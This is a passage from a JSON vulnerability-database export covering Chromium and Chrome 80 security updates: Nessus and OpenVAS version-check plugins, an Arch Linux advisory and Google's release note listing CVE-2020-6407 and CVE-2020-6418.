\"CVE-2020-6429\", \"CVE-2020-6449\");\n script_xref(name:\"FEDORA\", value:\"2020-39e0b8bd14\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Fedora 30 : chromium (2020-39e0b8bd14)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 80.0.3987.149. Upstream says it fixes '13' security issues,\nbut only lists these CVEs :\n\n - CVE-2020-6422: Use after free in WebGL\n\n - CVE-2020-6424: Use after free in media\n\n - CVE-2020-6425: Insufficient policy enforcement in\n extensions. \n\n - CVE-2020-6426: Inappropriate implementation in V8\n\n - CVE-2020-6427: Use after free in audio\n\n - CVE-2020-6428: Use after free in audio\n\n - CVE-2020-6429: Use after free in audio.\n\n - CVE-2019-20503: Out of bounds read in usersctplib.\n\n - CVE-2020-6449: Use after free in audio\n\n----\n\nUpdate to 80.0.3987.132. Lots of security fixes here. 
VAAPI re-enabled\nby default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420 \n\n----\n\nUpdate to 79.0.3945.130. Fixes the following security issues :\n\n - CVE-2020-6378\n\n - CVE-2020-6379\n\n - CVE-2020-6380\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-39e0b8bd14\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6449\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-80.0.3987.149-1.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:07:54", "description": "The remote host is affected by the vulnerability described in GLSA-202003-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. 
Please review the referenced CVE identifiers and Google Chrome Releases for details.\n Impact :\n\n A remote attacker could execute arbitrary code, escalate privileges, obtain sensitive information, spoof an URL or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-13T00:00:00", "type": "nessus", "title": "GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13723", "CVE-2019-13724", "CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", 
"CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764", "CVE-2019-13767", "CVE-2020-6377", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6385", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202003-08.NASL", "href": "https://www.tenable.com/plugins/nessus/134475", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202003-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134475);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-13723\", \"CVE-2019-13724\", \"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\", \"CVE-2019-13767\", \"CVE-2020-6377\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6385\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"GLSA\", value:\"202003-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n 
script_name(english:\"GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202003-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, escalate privileges,\n obtain sensitive information, spoof an URL or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202003-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-80.0.3987.132'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-80.0.3987.132'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-202002-11\n==========================================\n\nSeverity: High\nDate : 2020-02-25\nCVE-ID : CVE-2020-6407 CVE-2020-6418\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1102\n\nSummary\n=======\n\nThe package chromium before version 80.0.3987.122-1 is vulnerable to\nmultiple issues including arbitrary code execution and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 80.0.3987.122-1.\n\n# pacman -Syu \"chromium>=80.0.3987.122-1\"\n\nThe problems have been fixed upstream in version 
80.0.3987.122.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-6407 (information disclosure)\n\nAn out-of-bounds memory access vulnerability has been found in the\nstreams component of chromium before 80.0.3987.122.\n\n- CVE-2020-6418 (arbitrary code execution)\n\nA type confusion vulnerability has been found in the V8 component of\nchromium before 80.0.3987.122.\n\nImpact\n======\n\nA remote attacker can access sensitive information or execute arbitrary\ncode on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\nhttps://crbug.com/1045931\nhttps://crbug.com/1053604\nhttps://security.archlinux.org/CVE-2020-6407\nhttps://security.archlinux.org/CVE-2020-6418", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-25T00:00:00", "type": "archlinux", "title": "[ASA-202002-11] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T00:00:00", "id": "ASA-202002-11", "href": 
"https://security.archlinux.org/ASA-202002-11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2021-12-30T22:31:46", "description": "The stable channel has been updated to 80.0.3987.122 for Windows, Mac, and Linux, which will roll out over the coming days/weeks. \n\n\n\n\n\n\nA list of all changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/80.0.3987.116..80.0.3987.122?pretty=fuller&n=10000>). Interested in switching release channels? [ Find out how](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\n\n\n\n**Security Fixes and Rewards** \n\n\n\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n** \n** \n\n\nThis update includes [3](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-3-M80>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n** \n** \n\n\n[$5000][[1044570](<https://crbug.com/1044570>)] High: Integer overflow in ICU. Reported by Andr\u00e9 Bargull (with thanks to Jeff Walden from Mozilla) on 2020-01-22\n\n[N/A][[1045931](<https://crbug.com/1045931>)] High CVE-2020-6407: Out of bounds memory access in streams. 
Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n\n** \n** \n\n\nThis release also contains:\n\n[N/A][[1053604](<https://crbug.com/1053604>)] High CVE-2020-6418: Type confusion in V8. Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n\n** \n** \n\n\nGoogle is aware of reports that an exploit for CVE-2020-6418 exists in the wild.\n\n** \n** \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\n\n\n\n\n\n\nKrishna Govind \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-24T00:00:00", "id": "GCSA-2415374810976728715", "href": "https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-03-04T16:40:33", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310816586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816586", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816586\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:38:45", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310816584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816584", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public 
License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816584\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n 